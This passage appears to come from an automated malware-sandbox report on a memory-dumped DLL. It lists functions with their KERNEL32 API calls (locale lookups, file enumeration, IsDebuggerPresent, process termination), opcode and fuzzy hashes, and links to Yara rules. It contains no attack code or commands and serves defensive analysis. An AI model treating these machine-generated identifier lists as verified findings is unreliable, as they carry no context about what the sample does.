    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
    • String ID: utf8
    • API String ID: 4147378913-905460609
    • Opcode ID: d4dce55865838ccdc4576b08ddc6ec48ec902a7c57d6bee3f15b6c7afcd9e0fd
    • Instruction ID: d78fea38672865cb5b77d662cfdd72af5e1de1b1ab1a210d5fb313ed846aef42
    • Opcode Fuzzy Hash: d4dce55865838ccdc4576b08ddc6ec48ec902a7c57d6bee3f15b6c7afcd9e0fd
    • Instruction Fuzzy Hash: BB713B71644203AAE71EDB75CD49FB773A8FF85304F11C86AEA05D7980EB70E94187A2
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D54F1CF, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON
    Download Yara Rule
    APIs
    • GetLocaleInfoW.KERNEL32(?,2000000B,6D54F4ED,00000002,00000000,?,?,?,6D54F4ED,?,00000000), ref: 6D54F268
    • GetLocaleInfoW.KERNEL32(?,20001004,6D54F4ED,00000002,00000000,?,?,?,6D54F4ED,?,00000000), ref: 6D54F291
    • GetACP.KERNEL32(?,?,6D54F4ED,?,00000000), ref: 6D54F2A6
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: InfoLocale
    • String ID: ACP$OCP
    • API String ID: 2299586839-711371036
    • Opcode ID: 1b23e779680c22bce25c562be7c8f9160bbcb67ef42a9147fe2f01f709d2d44f
    • Instruction ID: ac97e00777d40908981faea32fca04b60d1a0b2c34faa57eaf7e2482a40eb842
    • Opcode Fuzzy Hash: 1b23e779680c22bce25c562be7c8f9160bbcb67ef42a9147fe2f01f709d2d44f
    • Instruction Fuzzy Hash: E521A43AA4C102A6E75DCF5CCE01A9B73B6BB85B54B52CD24E905C7900E732DD40C762
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D54F3A4, Relevance: 7.7, APIs: 5, Instructions: 183COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 6D5435B9: GetLastError.KERNEL32(?,?,?,6D550F08,00000000,00000001,6D54A405,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,00000000), ref: 6D5435BE
      • Part of subcall function 6D5435B9: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,00000000,00000000,6D572358,0000002C,6D54A405), ref: 6D54365C
      • Part of subcall function 6D5435B9: _free.LIBCMT ref: 6D54361B
      • Part of subcall function 6D5435B9: _free.LIBCMT ref: 6D543651
    • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 6D54F4B0
    • IsValidCodePage.KERNEL32(00000000), ref: 6D54F4F9
    • IsValidLocale.KERNEL32(?,00000001), ref: 6D54F508
    • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 6D54F550
    • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 6D54F56F
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
    • String ID:
    • API String ID: 949163717-0
    • Opcode ID: 0342d1bd0088ea01e71d3b5c6ade30597ffe17d61c3e8a48bdfcfd21e39eb471
    • Instruction ID: 10b3acbe3ac6cbad06cc1ab24985ce8530a03155b276faebcad073cae3c52fba
    • Opcode Fuzzy Hash: 0342d1bd0088ea01e71d3b5c6ade30597ffe17d61c3e8a48bdfcfd21e39eb471
    • Instruction Fuzzy Hash: 7A515671A00206AFEF09DFA8CC44BBF77B8FF45704F158869E614E7590EB7099448B62
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D54EE56, Relevance: 4.7, APIs: 3, Instructions: 205COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 6D5435B9: GetLastError.KERNEL32(?,?,?,6D550F08,00000000,00000001,6D54A405,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,00000000), ref: 6D5435BE
      • Part of subcall function 6D5435B9: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,00000000,00000000,6D572358,0000002C,6D54A405), ref: 6D54365C
      • Part of subcall function 6D5435B9: _free.LIBCMT ref: 6D54361B
      • Part of subcall function 6D5435B9: _free.LIBCMT ref: 6D543651
    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6D54EEAA
    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6D54EEF4
    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6D54EFBA
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: InfoLocale$ErrorLast_free
    • String ID:
    • API String ID: 3140898709-0
    • Opcode ID: e7cb463a65565a5929bd6877efbeab7dc706c671a5b42aaf9e522aa4976f3da2
    • Instruction ID: 0cc055dffd1249d8df7f3b42a93f58f8317eaadc597d79e04f37077076ad2b62
    • Opcode Fuzzy Hash: e7cb463a65565a5929bd6877efbeab7dc706c671a5b42aaf9e522aa4976f3da2
    • Instruction Fuzzy Hash: 86618071554217ABEB1DCF28CC81BBAB7B8FF44305F10857AE91AC6984EB34D981CB52
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D546773, Relevance: 4.6, APIs: 3, Instructions: 132fileCOMMON
    Download Yara Rule
    APIs
    • FindFirstFileExW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000000,?,00000000), ref: 6D54680E
    • FindNextFileW.KERNEL32(00000000,?), ref: 6D54688C
    • FindClose.KERNEL32(00000000), ref: 6D5468CE
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Find$File$CloseFirstNext
    • String ID:
    • API String ID: 3541575487-0
    • Opcode ID: 53416b817e9290a1aa98f03c0a2cc651cd75d0103bac42490053baa040121868
    • Instruction ID: 034db084aedc4ae4b86a9c856dbbc7c793671274f391eab28b549f9d298d9f80
    • Opcode Fuzzy Hash: 53416b817e9290a1aa98f03c0a2cc651cd75d0103bac42490053baa040121868
    • Instruction Fuzzy Hash: 8841A471904315ABDB28DE69CC88FFAB7B9EBC5314F01C599E505D7580EA309E84CAA1
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D5369B4, Relevance: 4.6, APIs: 3, Instructions: 77COMMON
    Download Yara Rule
    APIs
    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,6D52A161), ref: 6D536AAC
    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,6D52A161), ref: 6D536AB6
    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,6D52A161), ref: 6D536AC3
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ExceptionFilterUnhandled$DebuggerPresent
    • String ID:
    • API String ID: 3906539128-0
    • Opcode ID: 1eb67e57d6d192639991a3bbe1ebb6fe96fd8d4f6f7b41c13797e12fe1dfd6e3
    • Instruction ID: 64000505052173bb164dde99755aab7b5b4f57027a00b979e3222878f1147502
    • Opcode Fuzzy Hash: 1eb67e57d6d192639991a3bbe1ebb6fe96fd8d4f6f7b41c13797e12fe1dfd6e3
    • Instruction Fuzzy Hash: 0831D2749013299BCF25DF24D888B8DBBB8BF08310F5145EAE51CA7290EB309F858F44
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D537381, Relevance: 4.5, APIs: 3, Instructions: 20COMMON
    Download Yara Rule
    APIs
    • GetCurrentProcess.KERNEL32(?,?,6D537380,?,00000001,?,?), ref: 6D5373A3
    • TerminateProcess.KERNEL32(00000000,?,6D537380,?,00000001,?,?), ref: 6D5373AA
    • ExitProcess.KERNEL32 ref: 6D5373BC
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Process$CurrentExitTerminate
    • String ID:
    • API String ID: 1703294689-0
    • Opcode ID: 06e027de8309c0525b676598bfaeddaa73c3ae9beef34837fe58af935d0533cb
    • Instruction ID: b4ad4a45c7e2e37e09ad01288dc024f007d84924000b3696415a1e0a4d5e27a4
    • Opcode Fuzzy Hash: 06e027de8309c0525b676598bfaeddaa73c3ae9beef34837fe58af935d0533cb
    • Instruction Fuzzy Hash: D7E0B631808518EBCF0A6F64C948B593F79FF81792B124914F905C6930DB35ED52CA91
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D551FD3, Relevance: 2.7, APIs: 1, Instructions: 1236COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: __floor_pentium4
    • String ID:
    • API String ID: 4168288129-0
    • Opcode ID: a6e197a2c8c45d85281c0c129cb01c824eb285239e8227a1aa8d97bd6a10a6d5
    • Instruction ID: cae4d76a3104a9ab075e12cc6f5eeb635f827cb3e91f523c13a5d9baf605acdc
    • Opcode Fuzzy Hash: a6e197a2c8c45d85281c0c129cb01c824eb285239e8227a1aa8d97bd6a10a6d5
    • Instruction Fuzzy Hash: 3DB24971E086298FDB7ACE28DC407AAB3B5EB89305F1145EAD80DE7640D774AE918F41
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D5463B7, Relevance: 1.7, APIs: 1, Instructions: 191COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 0f0950cee9458dfe0b820502178581a0501a123c3235325ca545659e205f4901
    • Instruction ID: 8187fee4c81cacc5c08e2e8f698c1dab82a44324cdf29e6ae25c77ffd69001f3
    • Opcode Fuzzy Hash: 0f0950cee9458dfe0b820502178581a0501a123c3235325ca545659e205f4901
    • Instruction Fuzzy Hash: 6051D4B5804319AFDB18CF68CC98BFABBB9EF85304F15859DE51993600EA319E448F90
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D52AABF, Relevance: 1.6, APIs: 1, Instructions: 144COMMON
    Download Yara Rule
    APIs
    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6D52AAD5
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: FeaturePresentProcessor
    • String ID:
    • API String ID: 2325560087-0
    • Opcode ID: 715f1cf482af03c8e116dc4950f95aae7dd5eb2991dfb7dadb713f9268b310f1
    • Instruction ID: 00c40ff510700b5b54a77fe5eb1d42d0afb5060b4747c0ccca9f3568b2090f10
    • Opcode Fuzzy Hash: 715f1cf482af03c8e116dc4950f95aae7dd5eb2991dfb7dadb713f9268b310f1
    • Instruction Fuzzy Hash: 90515CB2A05216CFDF09CF55D881BAABBF1FB4A311F21896AD415EBB80D3749904CF60
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D54F0A9, Relevance: 1.6, APIs: 1, Instructions: 83COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 6D5435B9: GetLastError.KERNEL32(?,?,?,6D550F08,00000000,00000001,6D54A405,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,00000000), ref: 6D5435BE
      • Part of subcall function 6D5435B9: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,00000000,00000000,6D572358,0000002C,6D54A405), ref: 6D54365C
      • Part of subcall function 6D5435B9: _free.LIBCMT ref: 6D54361B
      • Part of subcall function 6D5435B9: _free.LIBCMT ref: 6D543651
    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6D54F0FD
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ErrorLast_free$InfoLocale
    • String ID:
    • API String ID: 2003897158-0
    • Opcode ID: 212a061240f9b994b3141acd89187e9ed0826451932885a15a1baf11c3264831
    • Instruction ID: 40b398ada8cfe79ee73868a376fe96912c4824e38973000fcd28f8c41bac8f9c
    • Opcode Fuzzy Hash: 212a061240f9b994b3141acd89187e9ed0826451932885a15a1baf11c3264831
    • Instruction Fuzzy Hash: 0321C871655207ABEB1C8A5CDC41A7B73BCEF45318F11907AEE01C7A40EB34DD058B51
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D54ED30, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 6D5435B9: GetLastError.KERNEL32(?,?,?,6D550F08,00000000,00000001,6D54A405,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,00000000), ref: 6D5435BE
      • Part of subcall function 6D5435B9: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,00000000,00000000,6D572358,0000002C,6D54A405), ref: 6D54365C
    • EnumSystemLocalesW.KERNEL32(6D54EE56,00000001,00000000,?,-00000050,?,6D54F484,00000000,?,?,?,00000055,?), ref: 6D54EDA2
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ErrorLast$EnumLocalesSystem
    • String ID:
    • API String ID: 2417226690-0
    • Opcode ID: 4c117d396240e741a68818cf39dd1f71236e99b8c63d9e65d5c3b95ccdb983c2
    • Instruction ID: e7c481701be8416b17c3c8d621de211d7c2ae69c2ab64bf017fd86beb626b705
    • Opcode Fuzzy Hash: 4c117d396240e741a68818cf39dd1f71236e99b8c63d9e65d5c3b95ccdb983c2
    • Instruction Fuzzy Hash: 0011E93A2047019FDB1CDF39C8945BAB7A1FF80758B15882DD98687F40E771B942CB40
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D54F2D5, Relevance: 1.5, APIs: 1, Instructions: 45COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 6D5435B9: GetLastError.KERNEL32(?,?,?,6D550F08,00000000,00000001,6D54A405,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,00000000), ref: 6D5435BE
      • Part of subcall function 6D5435B9: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,00000000,00000000,6D572358,0000002C,6D54A405), ref: 6D54365C
    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,6D54F072,00000000,00000000,?), ref: 6D54F301
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ErrorLast$InfoLocale
    • String ID:
    • API String ID: 3736152602-0
    • Opcode ID: 68e7985ea3a6352204ebb984def6f341482bb2028bc649d4c2e3303a5923fe80
    • Instruction ID: 29070f9c9b911a6b936ce5bbd99f957ed38ed4fbebf18a60fdddcefa8f8fcd83
    • Opcode Fuzzy Hash: 68e7985ea3a6352204ebb984def6f341482bb2028bc649d4c2e3303a5923fe80
    • Instruction Fuzzy Hash: 9CF0A432600216ABDB1C9A6D8815BBB7768EB40794F018869ED55E3980EA74FE42C691
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D54EDCB, Relevance: 1.5, APIs: 1, Instructions: 41COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 6D5435B9: GetLastError.KERNEL32(?,?,?,6D550F08,00000000,00000001,6D54A405,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,00000000), ref: 6D5435BE
      • Part of subcall function 6D5435B9: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,00000000,00000000,6D572358,0000002C,6D54A405), ref: 6D54365C
    • EnumSystemLocalesW.KERNEL32(6D54F0A9,00000001,00000000,?,-00000050,?,6D54F448,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 6D54EE15
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ErrorLast$EnumLocalesSystem
    • String ID:
    • API String ID: 2417226690-0
    • Opcode ID: 33db6e83f26c545a5ed0ec2698403c253c0e028d9add8932fc364bc075bdd1da
    • Instruction ID: c666dc49453ce035d153ee6141d28c82650f6556b591b878d2b59ffc84e4f985
    • Opcode Fuzzy Hash: 33db6e83f26c545a5ed0ec2698403c253c0e028d9add8932fc364bc075bdd1da
    • Instruction Fuzzy Hash: B6F0F6362043059FDB2D9F799884A7B7BA1FFC1368F06C82DFA458BA40D771AC02C651
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D548740, Relevance: 1.5, APIs: 1, Instructions: 33COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 6D545A0F: EnterCriticalSection.KERNEL32(?,?,6D536ED2,00000000,6D571F50,0000000C,6D536E99,?,?,6D545D63,?,?,6D54375B,00000001,00000364,00000007), ref: 6D545A1E
    • EnumSystemLocalesW.KERNEL32(6D548733,00000001,6D572278,0000000C,6D548FD4,00000000), ref: 6D548778
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: CriticalEnterEnumLocalesSectionSystem
    • String ID:
    • API String ID: 1272433827-0
    • Opcode ID: b349e42210658b311f26e478b0acbf588baa9f76d8cab3ada60e5e82e949d441
    • Instruction ID: 39b6eb2ca8ca3885b67c6c729282ab0ea8b72cfb34601ce3fca1c5ca0248efa1
    • Opcode Fuzzy Hash: b349e42210658b311f26e478b0acbf588baa9f76d8cab3ada60e5e82e949d441
    • Instruction Fuzzy Hash: F6F04936A04214DFEB14DF98D440B9D7BF0EB8A325F11811AE610DBB90CB7559018F92
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D54ECC7, Relevance: 1.5, APIs: 1, Instructions: 31COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 6D5435B9: GetLastError.KERNEL32(?,?,?,6D550F08,00000000,00000001,6D54A405,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,00000000), ref: 6D5435BE
      • Part of subcall function 6D5435B9: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,00000000,00000000,6D572358,0000002C,6D54A405), ref: 6D54365C
    • EnumSystemLocalesW.KERNEL32(6D54EC20,00000001,00000000,?,?,6D54F4A6,-00000050,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 6D54ECFE
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ErrorLast$EnumLocalesSystem
    • String ID:
    • API String ID: 2417226690-0
    • Opcode ID: 2c5931e8d5f4370e3cbede37cb970f004e2bc8d03fbf30847f7a495c21913e1d
    • Instruction ID: ff5be636984e72e6ab3cd0c850e4190cec132ee8da09377cc4f21de06c5d9eef
    • Opcode Fuzzy Hash: 2c5931e8d5f4370e3cbede37cb970f004e2bc8d03fbf30847f7a495c21913e1d
    • Instruction Fuzzy Hash: 1DF0E53670020557CB09DF35D849B6ABFA5EFC2714B0B845AEE05CBA51C631E842C791
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D549163, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
    Download Yara Rule
    APIs
    • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,6D54553A,?,20001004,00000000,00000002,?,?,6D54489B), ref: 6D549197
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: InfoLocale
    • String ID:
    • API String ID: 2299586839-0
    • Opcode ID: 5218ff68726bda259077d32da57b2568b8bf107d966b8c99e6dc93766c7cb16d
    • Instruction ID: 5c6787b54b9030cd56b6b1e1325b9860ff82750869701f433f42cc449db680da
    • Opcode Fuzzy Hash: 5218ff68726bda259077d32da57b2568b8bf107d966b8c99e6dc93766c7cb16d
    • Instruction Fuzzy Hash: 55E04F32500629BBCF076FA1DD09EAE3F29EF85750F018415FE1466650CB318D21AED6
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D548840, Relevance: 1.5, APIs: 1, Instructions: 14COMMON
    Download Yara Rule
    APIs
    • EnumSystemLocalesW.KERNEL32(Function_00048733,00000001), ref: 6D54885A
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
